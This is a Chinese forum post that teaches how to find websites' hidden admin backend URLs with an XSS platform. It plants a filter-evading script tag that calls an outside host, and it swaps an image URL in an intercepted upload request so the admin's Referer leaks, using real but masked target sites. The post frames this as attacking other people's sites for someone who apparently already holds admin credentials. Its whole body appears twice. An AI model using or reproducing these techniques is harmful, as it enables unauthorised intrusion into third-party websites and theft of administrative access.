本帖最后由 Shrimp 于 2017-3-11 16:27 编辑
首先,大家先看完我的简述然后在考虑是否踩我,真心谢谢。
第一:这篇文章特别特别特别水!(别浪费时间看了,适合新手看,所以我发在了水区)
好了,这里做一个简单的教程,获取管理员后台地址的教程。
首先,如下图,坛子里有个人私信我,如下图:
说实话,对这种行为个人略微有些反感。
【案例一 不可植入XSS代码】这里大家注意,这个人只问我要后台地址,估测他可能有后台管理员账号和密码了,但是找不到后台地址,我这么理解的。
很多时候大家获取到了管理的账号密码,却找不到后台地址,而这个网站还不存在注入、XSS等问题,虽然有了管理账号和密码,但是却无任何用处。
正好这个案例就是这样。
我们先登录第二个网址:www.xxxx.net/
习惯性,的直接进入发布供求信息页面。一般这样的页面都会存在XSS,让我们来试验一下。如图。我们先来到自己的XSS平台源码处(这步真是废话,但是一点点说么)
这里就是你的XSS平台给你的 JS代码,你只需要复制其中的代码,例如我复制的是:<sCRiPt sRC=http://xxx.xxx/xxx1></sCrIpT>
然后 再次回到我们要攻击的网站
仔细看图片
然后发布文章,不过这个时候问题出现了,注意下图
提示有风险,简单的说禁止放入恶意代码。 如果是这样的话那怎么办?不过刚才已经说了,我们只需要获取管理员的后台地址,那么我们可以剑走偏锋!利用图片来获取对方的Referer 。
大家仔细看上面的上面的图片,有一处上传图片,我们随便上传一个图片,然后数据抓包
注意图片中我画箭头的两个地方。
明显是图片地址对吧, 我们只需要把这个图片地址替换成我们XSS平台提供的图片地址即可,自己可以看上方XSS平台已经提供了 专用的图片地址。
替换后的数据包
注意到了么,然后我们提交以下。。。。看一下最终结果。
看到了吧,只要管理员看到我这个信息,或者说看到了我这个图片,XSS平台就会获取到管理员的后台地址。 SO。。 下一步就是等XSS平台信息了。
下面这个图,是我自己获取到的自己的信息。。。。
最后就是坐等管理员看了。
补图、:::::::管理员中招的图片
【案例二 可植入XSS代码】先讲第一个网站吧:www.xxxx.net.cn 如果利用XSS获取这个网站后台呢。大家可以注册一个账户,然后来到后台的任意地方。
如下地址:http://member.xxxx.net.cn/Company/Contact?menuType=Company&;submenuFlag=CompanyContact
看到了吧,随便找个地方 放入XSS平台生成的代码,然后我们就坐等结果。
最后XSS平台接受到的结果,如图:
首先,大家先看完我的简述然后在考虑是否踩我,真心谢谢。
第一:这篇文章特别特别特别水!(别浪费时间看了,适合新手看,所以我发在了水区)
好了,这里做一个简单的教程,获取管理员后台地址的教程。
首先,如下图,坛子里有个人私信我,如下图:
说实话,对这种行为个人略微有些反感。
【案例一 不可植入XSS代码】这里大家注意,这个人只问我要后台地址,估测他可能有后台管理员账号和密码了,但是找不到后台地址,我这么理解的。
很多时候大家获取到了管理的账号密码,却找不到后台地址,而这个网站还不存在注入、XSS等问题,虽然有了管理账号和密码,但是却无任何用处。
正好这个案例就是这样。
我们先登录第二个网址:www.xxxx.net/
习惯性,的直接进入发布供求信息页面。一般这样的页面都会存在XSS,让我们来试验一下。如图。我们先来到自己的XSS平台源码处(这步真是废话,但是一点点说么)
这里就是你的XSS平台给你的 JS代码,你只需要复制其中的代码,例如我复制的是:<sCRiPt sRC=http://xxx.xxx/xxx1></sCrIpT>
然后 再次回到我们要攻击的网站
仔细看图片
然后发布文章,不过这个时候问题出现了,注意下图
提示有风险,简单的说禁止放入恶意代码。 如果是这样的话那怎么办?不过刚才已经说了,我们只需要获取管理员的后台地址,那么我们可以剑走偏锋!利用图片来获取对方的Referer 。
大家仔细看上面的上面的图片,有一处上传图片,我们随便上传一个图片,然后数据抓包
注意图片中我画箭头的两个地方。
明显是图片地址对吧, 我们只需要把这个图片地址替换成我们XSS平台提供的图片地址即可,自己可以看上方XSS平台已经提供了 专用的图片地址。
替换后的数据包
注意到了么,然后我们提交以下。。。。看一下最终结果。
看到了吧,只要管理员看到我这个信息,或者说看到了我这个图片,XSS平台就会获取到管理员的后台地址。 SO。。 下一步就是等XSS平台信息了。
下面这个图,是我自己获取到的自己的信息。。。。
最后就是坐等管理员看了。
补图、:::::::管理员中招的图片
【案例二 可植入XSS代码】先讲第一个网站吧:www.xxxx.net.cn 如果利用XSS获取这个网站后台呢。大家可以注册一个账户,然后来到后台的任意地方。
如下地址:http://member.xxxx.net.cn/Company/Contact?menuType=Company&;submenuFlag=CompanyContact
看到了吧,随便找个地方 放入XSS平台生成的代码,然后我们就坐等结果。
最后XSS平台接受到的结果,如图:
个人博客:https://woj.app
打人不打脸,求放过。
打人不打脸,求放过。











